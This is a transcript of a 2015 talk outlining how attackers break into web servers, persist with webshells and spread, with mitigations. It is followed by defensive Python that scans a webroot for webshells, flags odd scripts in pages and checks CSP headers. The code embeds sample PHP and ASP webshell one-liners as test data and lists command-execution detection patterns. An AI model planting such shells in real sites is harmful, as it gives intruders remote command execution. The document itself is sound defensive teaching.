Intrusions and the Modern Web

how and why bad guys break into servers

Benjamin Scott

November 23, 2015

Transcript

  1. The Modern Web

     Threat model: high - organized e-crime / espionage groups
     Risk profile: high - web developers want features / uptime
     Defense budget: low - until a breach hits the news

  2. Goal of Intrusions

     Liquid assets: credit cards / incoming traffic / hosting
     Enterprise access: non-segmented network / shared admin
     Great visibility: build a profile of the visitors who trust the site

  3. Intrusion Lifecycle

     Break In: find and exploit a websec / appsec issue
     Dig In: install a persistent backdoor
     Spread Out: rinse and repeat

  4. Break In

     Choose target: highly trafficked / VIPs of interest
     Try bruteforce: default admin / SQLi / file inclusion
     Use exploit: vulnerable service / CMS

  5. (really) Break In

     Steal creds: phish admins / keylog home machines
     Buy access: hire mercenaries / logins from the underground
     SIGINT: use active MITM to inject binaries

  6. Dig In

     Install webshell: e-crime - PHP shells; CN: Shell Crew - ASP shells; RU: Crouching Yeti - JavaScript patchwork; RU: APT28 - custom kit with analytics
     Keep access: local privilege escalation / new accounts

  7. Spread Out

     Identify victims: profile visitors / validate VIPs
     Deliver exploits: serve up a tailored exploit
     Relay traffic: implant commands sent via a covert channel

  8. Mitigations

     Monitoring: new referers / odd scripts / insecure configs
     Agile response: share tools between operations / security / IT
     Clean deploys: test appsec in CI / hardened images / CSP
     Hygiene checks: scan / honeyclient / red team your site
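The following Python is an added example, not code from the deck or from its author, that turns two of the slides into concrete hygiene checks: a webshell indicator scan over webroot files (the PHP/ASP shells of slide 6, "Dig In") and, for slide 8, a check for script tags a served page should not carry plus a check for weak script-src settings in a Content-Security-Policy header. The webroot contents, the sample page, the allowlisted host and the CSP header strings are all constructed for the example, and the indicator patterns are illustrative (request-controlled data reaching a code or command sink), not a complete shell signature set.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# ---- Check 1: webshell indicators in the webroot (slide 6, "Dig In") ----
# Constructed webroot for the example: path -> file contents.
WEBROOT = {
    "index.php": "<?php include 'app/bootstrap.php'; ?>",
    "uploads/avatar.php": "<?php @eval(base64_decode($_POST['c'])); ?>",
    "api/run.aspx": '<% System.Diagnostics.Process.Start(Request["cmd"]); %>',
    "js/site.js": "document.title = 'ok';",
}

# Illustrative indicators: request-controlled data flowing into a code/command sink.
SHELL_PATTERNS = [
    # PHP: eval/system/... ( [base64_decode(] $_POST|$_GET|$_REQUEST|$_COOKIE
    re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen)\s*\("
               r"\s*(base64_decode\s*\(\s*)?\$_(POST|GET|REQUEST|COOKIE)\b"),
    # PHP: variable function call, e.g. $_POST['f']($_POST['a'])
    re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\[[^\]]*\]\s*\("),
    # ASP.NET: Process.Start(Request[...])
    re.compile(r"Process\.Start\s*\(\s*Request\b"),
]

def scan_for_webshells(files):
    """Return the sorted paths whose contents match a webshell indicator."""
    return sorted(path for path, body in files.items()
                  if any(p.search(body) for p in SHELL_PATTERNS))

# ---- Check 2: scripts a served page should not carry (slide 8, "odd scripts") ----
# Constructed page: the first two scripts are expected; the last two are the kind
# of "JavaScript patchwork" appended to a compromised template.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example.com/app.js"></script>
<script src="/static/site.js"></script>
</head><body>
<script src="//stats-collector.example.net/t.js"></script>
<script>eval(atob("aGVsbG8="))</script>
</body></html>"""

ALLOWED_SCRIPT_HOSTS = {"cdn.example.com"}  # assumed allowlist for the site
INLINE_RED_FLAGS = ("eval(", "atob(", "unescape(", "fromCharCode", "document.write(")

class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None

def find_unexpected_scripts(html, allowed_hosts):
    """Return (kind, detail) findings: off-allowlist hosts and obfuscated inline code."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlparse(src).netloc  # empty for same-origin paths like /static/x.js
        if host and host not in allowed_hosts:
            findings.append(("external-script", src))
    for body in parser.inline:
        if any(flag in body for flag in INLINE_RED_FLAGS):
            findings.append(("suspicious-inline", body[:80]))
    return findings

# ---- Check 3: weak script-src in a CSP header (slide 8, "insecure configs" / CSP) ----
WEAK_SCRIPT_SOURCES = {"'unsafe-inline'", "'unsafe-eval'", "*", "data:", "http:", "https:"}

def csp_script_weaknesses(header):
    """Return weak tokens in script-src (or default-src if script-src is absent)."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return ["missing script-src and default-src"]
    return [s for s in sources if s in WEAK_SCRIPT_SOURCES]
```

Run the three functions from a cron job or a CI step: `scan_for_webshells` over a real webroot listing, `find_unexpected_scripts` over a fresh fetch of the landing page (so the check is what a visitor's browser would actually receive), and `csp_script_weaknesses` over the live response header. The script allowlist and the indicator patterns are the parts that need tuning per site; any new external host or a CSP that regresses to `'unsafe-inline'` is the "new referers / odd scripts / insecure configs" signal the slide calls for.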